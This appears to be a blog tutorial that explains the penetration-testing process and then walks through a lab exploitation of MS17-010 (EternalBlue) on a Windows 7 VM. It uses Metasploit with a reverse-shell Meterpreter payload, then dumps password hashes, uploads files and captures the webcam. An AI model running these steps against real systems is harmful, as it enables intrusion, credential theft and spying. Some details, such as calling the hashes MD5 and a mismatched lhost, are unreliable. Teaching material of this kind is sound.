Currently, most of the computers we use are win11 or win10. There are still many systems used by governments, companies, or schools that are still stuck on win7 .

Today is my first actual penetration test, using the Eternal Blue vulnerability to penetrate the win7 system

Of course, the penetration testing process will also be introduced in detail.

The process information of penetration testing is relatively detailed and contains a lot of content. If you want to see the actual process, you can directly select the part you want to see through the directory.

mind Mapping

1. Penetration testing

1,1,What is penetration testing?

Penetration Testing refers to the process in which professional security testers simulate hacker attacks and conduct active attack tests on the target system. By simulating attacks, penetration testing helps companies assess the security of their systems or networks, discover potential security holes and weaknesses, and provide corresponding protective measures and improvement suggestions. The purpose of penetration testing is to help organizations discover and repair security vulnerabilities in systems to improve security and defense capabilities.

1.2. Classification of penetration testing:

White box testing (will give you the source code, let you do code audit, or give you some information that needs to be penetrated, etc.)

Black box testing (give you a goal directly, go for it)

Gray box testing (a combination of the above two)

1.3, Penetration testing process

1.3.1, early interaction

Communicate with customers to understand the test goals, scope and requirements, and clarify the purpose and constraints of the test.

Scope confirmation:

Test target range: Confirm the specific system or network range to be tested, such as a specific IP address range, specific domain name or subdomain name.

Internal and external network scope: Determine whether the test target is in the internal network or the external network, or conduct internal and external tests at the same time.

Rule confirmation:

Penetration level: Clarify the depth and limitations of the test, such as whether attempts to escalate privileges, obtain sensitive information, etc. are allowed.

Time limits: Determine the time frame for the penetration test, including start and end times.

Other rules: Determine if there are specific regulations, compliance requirements, or security policies that need to be adhered to on a case-by-case basis.

Need confirmation:

WEB application vulnerabilities: If the target is a WEB application, determine the type of vulnerability to be tested, such as common SQL injection, cross-site scripting, etc.

Business logic vulnerabilities: For specific business processes and logic, confirm whether it is necessary to test security issues in the business process, such as logic vulnerabilities, unauthorized operations, etc.

Vulnerabilities in personnel rights management: Confirm whether it is necessary to assess vulnerabilities in personnel rights management, such as weak passwords, privilege escalation, etc.

By clarifying the scope, rules, and requirements, penetration testing can be customized more specifically to ensure that the test is performed as expected and to identify potential security risks in the system.

1.3.2,Intelligence collection

Use a variety of techniques and tools to collect information about the target system, including network topology, open ports, service identification, and more.

Way:

Active scanning: Use professional vulnerability scanning tools to scan target systems to discover known vulnerabilities and weaknesses.

Open search: Use search engines, such as Google, to search for information such as background, unauthorized pages, and sensitive URLs that may be leaked by the target system.

basic information:

Real IP: Determine the real IP address of the target system.

Network segment: Determine the network segment range of the target system.

Domain name: Confirm the domain name and related subdomain names of the target system.

Port: Scan the open ports of the target system to determine the services and applications exposed by the system.

system message:

Operating system version: Obtain the operating system and version information of the target system.

Application information:

Confirm the applications running on each port, such as WEB applications, email applications, etc.

Version Information:

Collect specific version information for detected applications, services, and systems.

Personnel information:

Domain name registrant information: Obtain the registrant information of the target domain name through WHOIS query and other methods.

Personnel information in WEB applications: Detect public information on the website, such as the ID of the poster, the name of the administrator, etc.

Protection information:

Try to identify whether the target system has deployed protective equipment, such as firewalls, intrusion detection systems, etc.

1.3.3,Threat modeling

Based on the situation of the target system, analyze potential threats and attack paths, and formulate penetration testing strategies for specific targets.

After collecting sufficient intelligence information, members of the penetration testing team will stop working on the keyboard and gather together to jointly conduct threat modeling and attack planning. This step is very critical, but often overlooked. Through the team's careful intelligence analysis and attack idea brainstorming, we can sort out the clues from a large amount of information and determine the most feasible attack channels and strategies.

During the threat modeling process, team members need to carefully analyze the collected intelligence information, including system architecture, vulnerability scanning results, permission control mechanisms, etc. We need to discuss possible threats together, classify and evaluate them to determine those that pose the greatest risk to the target system.

At the same time, during the attack planning stage, team members need to exchange their own attack ideas and innovative attack methods. We will discuss the most appropriate penetration testing methods and tools for different threats and attack paths. This also includes determining the sequence of attacks and how to best simulate the behavior of a real attacker.

Through collaborative team efforts and sharing of expertise, the threat modeling and attack planning phase can help team members more fully understand the vulnerabilities and potential risks of the target system. We can make decisions based on team discussions, determine the best attack path, and take steps to ensure successful testing.

The previous practices can help the team clarify goals, determine strategies, and provide clear directions for subsequent attack activities. The joint efforts and thinking collision of team members will help discover more attack paths and potential security risks to comprehensively improve the quality and effect of testing.

1.3.4, Vulnerability analysis

Use vulnerability scanners, manual testing and other methods to discover possible vulnerabilities in the target system, including software vulnerabilities, configuration errors, insecure access control, etc.

method:

Use vulnerability scanning tools: Use professional vulnerability scanning tools, such as Acunetix Web Vulnerability Scanner (AWVS), IBM AppScan, etc., to conduct automated vulnerability scans on the target system to discover known vulnerabilities and weaknesses.

Utilizing known exploits and EXP: Combined with automated scanning results, the penetration testing team may go to websites such as vulnerability exploit databases (such as exploit-db) to look for known exploit scripts (Exploits) to try to exploit the vulnerabilities found in the system.

Searching for verification POCs on the Internet: The team will search and verify verification POCs (Proof of Concept) shared by other security researchers or white hat hackers on various forums, blogs and vulnerability verification platforms to confirm that the vulnerabilities in the system can be exploited. sex.

content:

System vulnerabilities: The penetration testing team will focus on whether the target system has vulnerabilities that have not been patched in a timely manner. These vulnerabilities may be caused by not applying the latest security patches.

Web server vulnerabilities: The testing team carefully checks the web server for configuration issues such as default credentials, directory traversal, insecure file uploads, etc., which may lead to security vulnerabilities.

Web application vulnerabilities: The penetration testing team will focus on possible problems during the development of web applications, such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), etc.

Other port service vulnerabilities: In addition to web services, the penetration testing team will also check whether there are vulnerabilities in services provided by other ports opened by the target system, such as database services, mailbox services, etc.

Communication security: The team will pay attention to the communication protocol and encryption mechanism of the target system, and check whether there are communication security issues such as weak passwords and clear text transmission.

1.3.5, Vulnerability verification

For vulnerabilities in the scan results, perform manual verification and try to exploit them to confirm their authenticity and degree of harm.

Automated verification: Using a combination of scan results and reports provided by vulnerability scanning tools, teams can automatically verify the vulnerabilities and weaknesses present in the system. These tools can automatically scan and identify potential vulnerabilities to assist testing teams with subsequent verification and attack simulations.

Manual verification: Based on public resources, knowledge bases, and sharing from security researchers, the penetration testing team manually verifies possible vulnerabilities and security issues in the system. This includes manual system security checks and vulnerability exploitation attempts based on vulnerability descriptions and POC (Proof of Concept) verification scripts.

Experimental verification: In order to simulate the attack environment more realistically and verify the effectiveness of vulnerability exploitation, the penetration testing team may build their own simulation environment, such as a virtual machine environment or a network isolation environment, to conduct vulnerability verification and attack simulation. This allows for more in-depth testing and experimentation without affecting the real environment.

Login guessing: In some cases, the penetration testing team may try to guess information such as login accounts and passwords to verify whether the system has weak passwords or is vulnerable to password cracking attacks.

Business vulnerability verification: In addition to technical vulnerabilities, the penetration testing team also verifies business vulnerabilities in the system. This includes verification of business logic, permission control, data input, etc. to ensure the security of the system at the business level.

1.3.6, Penetration attack

Take advantage of the discovered vulnerabilities and try to obtain enough permissions to penetrate into the system, obtain sensitive information, access target system resources, etc., to simulate the behavior of a real attacker.

Precise attack: After detecting a vulnerability, you can prepare corresponding vulnerability exploitation tools or exploit scripts to conduct targeted attacks.

Bypassing defense mechanisms: During penetration testing, you may encounter firewalls and other security devices. In order to bypass these defense mechanisms, penetration testing teams can use a variety of techniques and methods, such as using proxies, tunnels, spoofing, etc. to circumvent defenses.

Customized attack paths: The penetration testing team will develop the best attack paths and strategies based on the system’s weak entrances, high intranet authority locations, and final goals. This usually requires a comprehensive consideration of the target system's structure, business processes, and security measures.

Bypassing detection mechanisms: When performing penetration testing, you may encounter security mechanisms such as traffic monitoring, anti-virus software, and malicious code detection. In order to bypass these detection mechanisms, the penetration testing team can adopt various methods, such as using encrypted communication, changing the attack load, using anti-virus tools, etc.

Exploit Code: Penetration testing teams sometimes try to write specific attack code to test the security of a system. This may include but is not limited to XSS code, SQL injection statements, etc.

1.3.7, post-penetration

After successfully penetrating into the system, further explore the internal network and system architecture of the target system to look for deeper vulnerabilities, privilege escalation, and the possibility of lateral movement.

Implement the attack: Based on the previous detection and verification results, the penetration testing team can execute the corresponding attack to simulate potential hacking behavior. This may include exploiting vulnerabilities, executing code, gaining privileged access, and more. When conducting penetration testing, it is important to adhere to legal and ethical rules and only conduct testing in authorized environments.

Obtain inside information: During a penetration test, the penetration testing team may try to obtain information about the target infrastructure, such as network connections, router configurations, network topology, etc. This helps understand the overall environment and security of the target system.

Further Penetration: Once access is gained within the internal network, the penetration testing team further penetrates and probes sensitive targets such as databases, critical systems, etc. This helps assess intranet security and potential lateral movement capabilities.

Persistent Presence: Typically, penetration testing does not involve creating a persistent presence. However, in order to simulate a real attack, the penetration testing team may try to install rootkits, backdoors, add management accounts and other technical means.

Clear traces: During the penetration testing process, the penetration testing team may delete relevant operation and access logs, uploaded files, etc. to minimize the impact on the target system and leave traces.

1.3.8, information organization

Information sorting is the process of sorting, organizing and archiving various data, results and findings collected during the entire penetration testing process.

Organize penetration tools: During the penetration testing process, various tools, codes, POC (Proof of Concept, proof of concept) and EXP (Exploit) are used to scan, detect, and attack the target system. Organizing these tools and related materials can help penetration testing teams better manage and use resources.

Organize and collect information: During the penetration testing process, the penetration testing team will collect various information about the target system, including network topology, IP address, open ports, service version, user information, etc. Collating and recording this information can make penetration testing results more comprehensive and reliable.

Organize vulnerability information: During the penetration testing process, the penetration testing team may discover various vulnerabilities and vulnerable location information, such as SQL injection, cross-site scripting vulnerabilities, etc. Organizing and classifying these vulnerabilities and vulnerable locations can provide clear conclusions and recommendations for the final penetration testing report.

Organize as needed: Organize all data and information according to the scope determined in advance with the customer to form a final penetration test report. Ensure that the compiled information and reports meet customer needs and provide detailed repair suggestions and recommendations.

Supplementary introduction: In the penetration test report, it is necessary to analyze and introduce the cause, verification process and potential harm of each vulnerability. This helps customers better understand the root cause of the vulnerability and the risks it may pose.

Remediation recommendations: Penetration testing reports should provide reasonable, efficient and secure remediation recommendations for all discovered vulnerabilities. These recommendations should be based on security best practices and relevant technical requirements to help customers effectively address potential security issues.

1.3.9, Report preparation and submission

Organize the results of penetration testing into a report, including testing methods, discovered vulnerabilities, risk assessments and improvement suggestions, etc., and submit them to customers for reference.

Cover: The first page of the report should contain relevant information such as the name, date, testing team, and client of the penetration testing project.

Focus and requirements: Clarify the focus and requirements in the report, such as test scope, target system, test purpose, etc.

Audience: Consider who the readers of the report are. People in different roles may pay attention to different content. Therefore, adjust the focus of the report content based on the audience.

Executive Summary: Provide an executive summary at the beginning of the report that briefly describes the overall results and key findings of the penetration test.

Vulnerability List: All discovered vulnerabilities and vulnerabilities should be listed in the report, categorized, scored, and described. It is recommended to use a concise and clear format so that readers can quickly obtain key information.

Penetration testing process description: Clearly and accurately describe the steps, tools used and attack process of the penetration testing. This helps readers understand the detailed process of penetration testing and gain a better contextual understanding of the vulnerabilities discovered.

Penetration testing team members and contact information: The report should include information about the testing team members, including name, title, and contact information. This allows readers to get in touch with the appropriate team member if they need further information or discuss the test results.

Remediation recommendations: Reports should provide reasonable and specific remediation recommendations for discovered vulnerabilities. These recommendations should be based on security best practices and relevant technical requirements to help customers better address potential security issues.

2. MS17-010 (Eternal Blue) vulnerability reappears

Introduction to Eternal Blue Vulnerability

To think about network security well, practical combat is indispensable.

2.1, Pre-attack environment

Attack machine: Kali-Linux-2021 Virtual machine IP: 192.168.223.138

Target machine: Windows7 Virtual machine IP: 192.168.223.137

The two machines need to be on the same network segment, that is, IP. The last three digits after the address will be consecutive numbers.

If you don’t know how to put the machines in the same network segment, you can read an article I wrote before:
kali, win7 and winxp systems ping each other http://t.csdn.cn/ZpUl9

2.2. Tools required for penetration

Nmap network scanning tool ( used for information collection )

Metasploit is an open source penetration testing framework used to perform network security assessment and penetration testing tasks. It provides a comprehensive set of tools and resources to discover vulnerabilities, perform attacks, and verify a system's security. Metasploit has a rich module library, including vulnerability scanning, attack load generation, remote code execution, backdoor installation and other functions, designed to help security professionals conduct security assessment and penetration testing. ( Used in attacks and exploits )

2.3, switch to administrator

First open the kali terminal and enter the following command, then enter the kali password and switch to administrator privileges

sudo su

2.4, perform link testing

First, we confirm whether the host is connected to the target machine by ping 192.168.223.137 -c 4

The following link information appears, indicating that the host and target drone can communicate with each other.

2.5, collect information

2.5.1, Use Nmap for port scanning

Scan class C addresses under the same network segment

nmap -T4 -A -v -Pn 192.168.223.1/24

We found that the other party's port 445 is open, we can try to attack the ms17-010 vulnerability

2.5.2, Obtain host system version and other information

Get some information about the version of the target machine and the host version through nmap

nmap -sV -Pn 192.168.223.137

Here we find that the target version information is win7, and we can also see from here that port 445 is open.

2.6, start Metasploit through command

Enter the penetration testing framework page. Note that the pictures on this page are different every time you enter it.

 msfconsole

After successful startup, we can use some modules in the framework

2.7, Search for vulnerability modules

2.7.1, Search module

Search for relevant modules related to ms17-010 in the penetration testing framework

 search ms17-010

2.7.2, Information you need to know before using the module

exploit is the attack module, auxiliary is the auxiliary module

2.8, Check whether the vulnerability can be exploited

Note that the order of modules may be inconsistent. You may not necessarily use module three.

Here we use module 3
use 3
Display the configuration information of the module and view the information that needs to be set.
show options
Then we set the IP address of the target machine
 set rhort 192.168.223.137 

Check whether the information is configured

2.9, execution module

run

Execute this module, and if the following appears, it means that there is a vulnerability, which means that the vulnerability can be exploited, then solve it and start performing

At this point, we have ensured that this vulnerability can be exploited

3. Start attacking

3.1, switch attack module

The attack module used is the module in the picture below

use 0

3.1, switch attack module

set payload windows/x64/meterpreter/reverse_tcp

3.3, View attack module configuration information

show options

3.4, Set up the necessary information for the module

Here we only need to set the following two pieces of information:

Set target machine IP (win7)
set rhost 192.168.223.137
Set attacker ip (kali)
set lhost 192.168.223.13

3.5, check whether the configuration information is set

show options

After ensuring that the settings are complete, we proceed to the next and final step

3.6, Attack

run

Entering this page, we see the character code win, and the penetration is successful. Next, we will start to complete the work.

After our attack is successful, next, we need to further perform some operations on the target host

4. After the attack is successful, what can we do to the target host?

4.1, View the current page of the drone

That is to say, take a screenshot of the drone page and then send it back to the host

screenshot

We found a photo of a screenshot from the win7 target machine page on the kali host.

4.2, Upload files to Windows host

We can send some files or pictures on the host to the target host, and of course Trojan files can also

One of the two paths behind here is the address of the file to be uploaded to the target machine, and the other is the address of the location to be uploaded to win7.

upload /home/kali/Desktop C:\

4.3, get shell execution permissions

Here we use getuid to check the permissions. We enter getuid to check the permissions and know that the permissions are administrator permissions, and then use shell to enter the win shell page ( win's command box interface )

getuid

shell

We see that there are garbled characters, let’s set them up, and find that the garbled characters feel familiar after setting them up.

It feels familiar. This is the command box interface of the win host.

chcp 65001

4.4. Obtain the account password of the win7 computer through shell permissions

Here we need to enter exit first to exit the win command line, and then perform the following operations

We enter the following command to obtain win’s account and password information. The first one is the user name, and the second one is the password.

 hashdump

It is found here that the account password is also encrypted. After playing ctf, it should be clear that this encryption is through MD5 encryption.

Then we decrypt the account password through the decryption website

Here I am querying the password of the second user. I can see that the password is 12345678.

Of course, we can also open the camera of the win host to record or take pictures . Of course, because my computer does not support the win7 driver, I will not give a demonstration, or download the files on the win7 host to the kali host, or It is to monitor the other party's keyboard.

Turn on camera

webcam_list -->View cameras

webcam_snap -->Taking pictures through the camera

webcam_stream -->Start video through camera

5. Summary

Through this penetration test, although it was not a penetration test on the web, it enabled me to become familiar with the penetration test process through actual combat. Of course, many problems also occurred during the practice, such as the path to uploading files from Kali to the Win host. The problem was that the IP address was set incorrectly when configuring the attack module. However, after constant thinking and trying, I finally solved the problem, which also improved my ability to solve problems.

A word a day

Life is like a journey, and you will encounter all kinds of scenery and people on the way. Perhaps everyone is a passer-by on our journey of life, some leaving deep footprints and some passing by in a hurry.

If my penetration notes are useful to you, please like and save them. Thank you for your support. Of course, you are also welcome to give me suggestions or supplement the shortcomings in the notes. It will be of great help to my study. Thank you.

Penetration Testing Basics: Eternal Blue Vulnerability Recurrence

Penetration testing + MS17-010 (Eternal Blue) vulnerability recurrence

Table of contents

Preface

mind Mapping

1. Penetration testing

1,1,What is penetration testing?

1.2. Classification of penetration testing:

1.3, Penetration testing process

1.3.1, early interaction

1.3.2,Intelligence collection

1.3.3,Threat modeling

1.3.4, Vulnerability analysis

1.3.5, Vulnerability verification

1.3.6, Penetration attack

1.3.7, post-penetration

1.3.8, information organization

1.3.9, Report preparation and submission

2. MS17-010 (Eternal Blue) vulnerability reappears

Introduction to Eternal Blue Vulnerability

2.1, Pre-attack environment

2.2. Tools required for penetration

2.3, switch to administrator

2.4, perform link testing

2.5, collect information

2.5.1, Use Nmap for port scanning

2.5.2, Obtain host system version and other information

2.6, start Metasploit through command

2.7, Search for vulnerability modules

2.7.1, Search module

2.7.2, Information you need to know before using the module

2.8, Check whether the vulnerability can be exploited

2.9, execution module

3. Start attacking

3.1, switch attack module

3.1, switch attack module

3.3, View attack module configuration information

3.4, Set up the necessary information for the module

3.5, check whether the configuration information is set

3.6, Attack

4. After the attack is successful, what can we do to the target host?

4.1, View the current page of the drone

4.2, Upload files to Windows host

4.3, get shell execution permissions

4.4. Obtain the account password of the win7 computer through shell permissions

5. Summary

Guess you like